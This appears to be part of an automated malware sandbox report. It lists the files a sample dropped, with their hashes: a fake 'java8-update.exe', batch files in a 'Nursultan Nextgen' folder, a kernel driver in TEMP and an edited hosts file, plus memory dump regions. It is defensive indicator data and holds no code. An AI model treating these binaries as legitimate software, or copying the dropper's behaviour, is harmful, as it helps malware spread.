SHA256
c466709e330efdd69f80a1cbfddeab225b052020f31c148a2a2df6f33db9c155

SHA512
d2e508a10eee5821fd100fc658dd8fd12ac6ea668abdae3467a0e84f53afd604b2a874f9d9538a1004dfa80ce90c77b07ea664d91d75a1b06ae7411bc3688d0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
73d51608035ec19f290acb54a4725fd5

SHA1
92b30f579c2b4f09e56054c80bea06660f99037f

SHA256
42050341b1ac5fa64ab9e61a463735292fe4e3899d8106ccecf699fe3609244d

SHA512
479812103d12c25538220def75ff0111a40bd1bdef106c87eb65277cfc7bd55f0e9fa1b8ded6e13caa1f9d714de9187c99b186efe993d41ccaa1b0ee37d37cd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d29a1ed5fa37b34f44166d04bb6e25ca

SHA1
f9dbc5af23f98959d371924139f099f956a8b76f

SHA256
76b134c00ed737bf182e7242e504127e5a40cb7165117c13a4f30c299e3a9ede

SHA512
a5a86f4334988bd51697e03de8b4f6603de3060085fdee011f5777467e06e9b80813d700798afa8dade81eb2cd66f0ddd03679d9c58509d72c47315b8f8fcc56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
456c4da13a635ffe8de4f3a70b5f3a55

SHA1
c030f9d358aebf31ecc52d4f6edde961a5fae8b6

SHA256
a35f6a7509532c1edc9fe6a082ed387821fb73c4c89674a7e906e657d7be4012

SHA512
74a43a61cd398c3d765f847dc96f64e61c932177a66b63434855ac23a42176b5845c3ae84665397476963870f429c0a7a4ddac467ed57f95c3d508735160a6a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bd2941cb99e7a63608aea60e46ab3d53

SHA1
23975b3ea8a2c5ca43dfb9af013ff8f8fd3a1294

SHA256
efcfa48b7a08c0698243c628379c86ad08510ca1db21e5cda0243f5fbff27aa4

SHA512
dc2182ad959d6f3406c3f0ef17c024bb59e73fbbfd3a1efebbb969953325c9fb6ce9861e8deea6d6d1eb6f6bc5675600cd0886e806a9966c093d990763ee500f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7bbcb94c7ed1bdaedcc332483d8d83e1

SHA1
202315679c2018d1257fb8c4724529b17b520d94

SHA256
b35fd6db76f9dc4f6138ff1cd5ed8ed1d747742097aedddc8f7533a612fe554e

SHA512
62c4053148b2011377f276c36fa4e342a2615021b29ef016a62f585660a6d241c96739b2faf5f4a4f7a10ae3278096dff5b0e88511aea8fc5aa3104dcbcdcb13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
64cb8fcd71c5b8e77519c7a129fcb059

SHA1
eb00e37bcc3dc7192878c56f7f57f1f3342b9b7e

SHA256
f3a840323675d3306e508921453e7076f8af4c0ed7c453d70dc56fba91f965ad

SHA512
4a0a1bb06253025dc9c8b2ee25d89c79e037a73df13456b296a72a4701dfc4068c666f38fb14723860754dd6a32dd2e9747a1aea38ce5de359f81cddc9eaeb85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6cdb83e7d64d5f4ebfaf726f68462943

SHA1
5e89a077e37e9b1043e93f56f242d0a350154564

SHA256
24bbcccd439f04b36c61c1920c86fe14e92365f25c5ebb623625e6d809870bc5

SHA512
c4195759d39177e65f0c7c65c0ea193b962f4ff7b3a93c1cbb95e60ec52c26acb661c43387f907580fcb8b8d834470c291bcede81096955c3aa8560830110bcd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
142bfcbab01f558e7a5d8f468afeb6dc

SHA1
f148b714d36a4c0200e54fec98fd584c8779b93a

SHA256
ebd2fa011b03924ddf5a3ec93450bc1448ae8262630d58c3f16e41efbb698971

SHA512
10158eade208dbc651613cb52045b3581228982053868fe3b810e91c554397818b220a25119718ffd9533702eec1b5d672165984a3c1d222079d1085817989ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dbeacf839ce2e5be70de99d8e002b13a

SHA1
da4d70521360e68669538f50ca52f5ac4069e6bf

SHA256
f0e38b8142a8b7045bcb616970662ee13ec1e22af5e3ae0274d70c2053f87f20

SHA512
ef7f0b0d51497adeaf37e34dfa5716efdffa0ed8a61f3e37e5cf12ec83b131dc128260dc77517a577694700a27ec87e94d988960201ef37e1bad447d57e71719

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e37505be4bcf9c1b2282d9ca7852e631

SHA1
918c5daa8285f5de324b9a3773ba5706dfb33375

SHA256
a4d10dc46beda592d5743cd9172f334f3ba61d99da411be8aa600c8a51d6614f

SHA512
a40015ec5810ccbada3e394c23f13c1de48e0239252668de0ceba8f39cde46f244a7b9ccca829004299909a67b1960558dca5d6a43f3f400fb409934845518c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0779c696f60097b538e978e0177735dc

SHA1
061fb150a7e2275b144a7defa6b8d08d056c74bc

SHA256
adb366436cddbb1633b0ec654b1ead72c6075d0d7aa184e3096736bf2d752f6e

SHA512
ddbf8c414941a9153ee07b84eab7bf1712ad36632d9559b214a8044926c356ca29d7008e548fd4148b8e3d5194ab49d112c7144b0c0fac15bbac025ce8778ac1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
035a440a34713a2f55a714ae89749a7b

SHA1
378cbde9f67a36a9f2ac602ba5e66cb201cfce27

SHA256
d28f7561af3c61b86b1137052aa8e8875111780d0427e62f363022025cbdad9e

SHA512
a48685677e16b7a32c0fbc8dc28f2e95f7de60f8333502aae10a7761f7f784e8a8d315989fa4c2c2e28b7438d780ace7836b20b389e85d96b5ccf80208b2d206

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3832d01395133df7bb966a1137344992

SHA1
a125580e6a26eb2e43b009127c5730cf0d05c7d4

SHA256
221e039d583a97132b44516e689d5dfe877ecda5b0c00a7ccbd1db67f170770d

SHA512
37c3ec6d436380fe4896e2c432e7825010c156331cd05fc0aaf3dfbc74c714f65646f03a374174963c9f6976660b3e7f21479290135d4d24d20c5d8a374aaf40

Download Submit
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe

Filesize
2.5MB

MD5
c9a04bf748d1ee29a43ac3f0ddace478

SHA1
891bd4e634a9c5fec1a3de80bff55c665236b58d

SHA256
a6ce588a83f2c77c794e3584e8ac44e472d26cf301bb2bf0468bcabae55070bc

SHA512
e17edb74f5cb4d8aabb4c775ec25a271f201da3adcb03541b1919526c0939694a768affc21c3066327e57c13bc9bb481074e51e4e78867df847b26f063b4c115

Download Submit
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe

Filesize
282KB

MD5
b13c890f3f9a4f4dd612cd1911b6f813

SHA1
2610f21aca69480eb9306f71df8310053261932f

SHA256
2adc279a513f2f95c3e86ac210cdce454399a8e286075c7ddea258ed3d4febb2

SHA512
532a8f2086323d24e48b4f5d1e036fac068bf4169fac720484686d86385c862c59e96a918b8080f73d665709531bf37d009de1187c6cb5724b7e551bdf1d6bd1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wgkzj41o.lyv.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\java.rar

Filesize
2.3MB

MD5
25dfd78ef1a6ab30a7a2ec0183cb8718

SHA1
d0fb0fb972e6e681da4d0ef66d361a722300e0f0

SHA256
3b6a76f2da56e27fdf5c217d1056fe0dbaa08797b1aa3f0d639243d3ce8a403c

SHA512
ad01527f61e0e93de145feaeebf65b74e41f3c01d479017afe04a5d459d8477d1be4cc5d57ec8b4da0bcabde2625824889269748b65dd3d3146b271a7558a01f

Download Submit
C:\Users\Admin\Desktop\Nursultan Nextgen\kdotDEbKM.bat

Filesize
179B

MD5
7102eac9d4a43f01519ced10a85fabfe

SHA1
4a194aab982ee18f6489913d642e6db9206be107

SHA256
9e6da0d60270007e846a3e29351ea2f83cc6a3546c059e57f9eacf9e6fa2951d

SHA512
f19b8c35aa2a672741afa6c858078e849c194b90c4bd7f0560920cf98b6b24625773ee240e7db907889814772d159bc54f396caf37f2cc82ccc6dff16355c1c2

Download Submit
C:\Users\Admin\Desktop\Nursultan Nextgen\kdotYKoIC.bat

Filesize
88B

MD5
280326e0ebc76fd9f809343a611a3621

SHA1
dce0bee9b26c2359eef7ab82c8a3d43304d7f194

SHA256
f0bce1970851ce310574dc9903fe19570ae1a199007e7fb5955395b7500f03f5

SHA512
1096734ef225e575b5c81d0d6c993a049791afd60ae24abc7934f4224408b6f2d1918b23e2f90e39fea6afa147cc90e62abb9d2471822cb80b9e1f2ffab331c5

Download Submit
C:\Windows\TEMP\ptmirhbjlenb.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
573d77d4e77a445f5db769812a0be865

SHA1
7473d15ef2d3c6894edefd472f411c8e3209a99c

SHA256
5ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c

SHA512
af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
631f4b3792b263fdda6b265e93be4747

SHA1
1d6916097d419198bfdf78530d59d0d9f3e12d45

SHA256
4e68d2d067c5680a2e55853ac58b16f199b09f1b9e5f2174605fff18da828976

SHA512
e0280041c4ca63971ab2524f25d2047820f031c1b4aeb6021a3367297045ddf6616ffccafb54630eb07fd154571d844329ebcc34d6ce64834cb77cba373e4fbe

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1007B

MD5
3a9662312614b856b548c94bc410cd23

SHA1
e008df0cd134359e2ae897975f5a258cdda67cef

SHA256
d47944cc0756d7b558fd2ee5cc0e1f8aeb195c22b5fa40c912130d1c36958395

SHA512
435a8555c0c90668baaf10c6c9e016b651bb14b1f0fe0427dade063d7de65621fd1bbb75e667276e5ba8049e30d4f018b86b5267df0b7b731c1cc314eaede2ed

Download Submit
memory/484-2351-0x00000142D3590000-0x00000142D35AC000-memory.dmp

Filesize
112KB

Download
memory/484-2357-0x00000142D3770000-0x00000142D3829000-memory.dmp

Filesize
740KB

Download
memory/484-2404-0x00000142D3580000-0x00000142D358A000-memory.dmp

Filesize
40KB

Download
memory/1752-3403-0x0000022EF41B0000-0x0000022EF4269000-memory.dmp

Filesize
740KB

Download
memory/2092-2529-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2092-2526-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2092-2527-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2092-2524-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2092-2522-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2092-2521-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2092-2518-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2092-2520-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2092-2528-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2092-2530-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2092-2525-0x000001E1643D0000-0x000001E1643F0000-memory.dmp

Filesize
128KB

Download
memory/2092-2523-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2092-3527-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2092-3528-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2092-2519-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3576-2517-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3576-2511-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3576-2512-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3576-2513-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3576-2514-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3576-2510-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3916-250-0x000002356EBF0000-0x000002356EC12000-memory.dmp

Filesize
136KB

Download
memory/3916-231-0x000002356EBF0000-0x000002356EC1A000-memory.dmp

Filesize
168KB

Download
memory/3916-62-0x000002356E740000-0x000002356E7B6000-memory.dmp

Filesize
472KB

Download
memory/3916-59-0x000002356E470000-0x000002356E492000-memory.dmp

Filesize
136KB

Download
memory/4688-1118-0x00000000052C0000-0x0000000005326000-memory.dmp

Filesize
408KB

Download
memory/4688-1117-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download